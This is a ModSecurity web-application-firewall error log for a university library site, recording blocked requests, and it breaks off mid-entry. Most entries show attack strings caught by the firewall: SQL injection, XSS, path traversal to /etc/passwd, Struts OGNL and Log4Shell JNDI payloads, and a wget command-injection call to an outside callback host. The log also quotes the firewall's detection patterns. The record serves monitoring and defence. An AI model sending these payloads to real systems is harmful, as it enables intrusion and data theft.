[Mon Aug 28 22:20:35.648964 2023] [:error] [pid 53514] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22DIRPEMKEMA UPI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOy7Q8Co-f0AANEKXNYAAAAS"]
[Mon Aug 28 22:49:47.643395 2023] [:error] [pid 53973] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22TRIANTO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzCG8Co-f0AANLVRUwAAAAW"]
[Mon Aug 28 22:58:51.895662 2023] [:error] [pid 54071] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PENGAJARAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzEO8Co-f0AANM3YT8AAAAD"]
[Mon Aug 28 23:37:38.623252 2023] [:error] [pid 55298] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22BUKU PINTAR\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzNUsCo-f0AANgC5YoAAAAT"]
[Tue Aug 29 06:24:46.924633 2023] [:error] [pid 60552] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22RUDIANTO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0svsCo-f0AAOyI7L4AAAAE"]
[Tue Aug 29 11:20:27.288029 2023] [:error] [pid 728] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO1yC8Co-f0AAALY@XAAAAAU"]
[Tue Aug 29 11:20:32.487751 2023] [:error] [pid 668] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO1yEMCo-f0AAAKcIyAAAAAA"]
[Tue Aug 29 11:30:10.834389 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10UsCo-f0AAAO-1mwAAAAI"]
[Tue Aug 29 11:30:10.875489 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/actions/seomatic/meta-container/meta-link-container/"] [unique_id "ZO10UsCo-f0AAAO-1m4AAAAI"]
[Tue Aug 29 11:30:11.810069 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/actions/seomatic/meta-container/all-meta-containers"] [unique_id "ZO10U8Co-f0AAANh1ngAAAAA"]
[Tue Aug 29 11:30:12.719302 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPLwA4AAAAX"]
[Tue Aug 29 11:30:13.355560 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAANh1oIAAAAA"]
[Tue Aug 29 11:30:13.452405 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VcCo-f0AAAN5YFsAAAAN"]
[Tue Aug 29 11:30:15.330624 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAPDnvAAAAAP"]
[Tue Aug 29 11:30:15.373386 2023] [:error] [pid 978] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAPS5v0AAAAh"]
[Tue Aug 29 11:30:16.319369 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlgnhh5nckudbx3f.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlgnhh5nckudbx3f.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlgnhh5nckudbx3f.oast.site\\x5c\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAOOuSwAAAAW"]
[Tue Aug 29 11:30:17.408635 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAOM4UoAAAAU"]
[Tue Aug 29 11:30:19.651252 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAPPSt0AAAAd"]
[Tue Aug 29 11:30:20.554974 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAN5YHkAAAAN"]
[Tue Aug 29 11:30:22.318056 2023] [:error] [pid 966] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAAPGfrcAAAAV"]
[Tue Aug 29 11:30:22.357679 2023] [:error] [pid 966] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlghtcxtpg6ehobt.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAPGfrgAAAAV"]
[Tue Aug 29 11:30:23.327529 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAPENb4AAAAQ"]
[Tue Aug 29 11:30:23.336261 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAPXAkgAAAAi"]
[Tue Aug 29 11:30:24.325698 2023] [:error] [pid 991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAPfm7MAAAAR"]
[Tue Aug 29 11:30:24.362396 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAOH4SUAAAAH"]
[Tue Aug 29 11:30:25.406775 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlgsno3anh5nccdh.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAPMl-MAAAAY"]
[Tue Aug 29 11:30:25.496787 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YcCo-f0AAANh1qIAAAAA"]
[Tue Aug 29 11:30:25.536784 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAPMl-QAAAAY"]
[Tue Aug 29 11:30:27.508127 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10Y8Co-f0AAAO875EAAAAF"]
[Tue Aug 29 11:30:27.517842 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10Y8Co-f0AAAO875EAAAAF"]
[Tue Aug 29 11:30:28.315536 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag 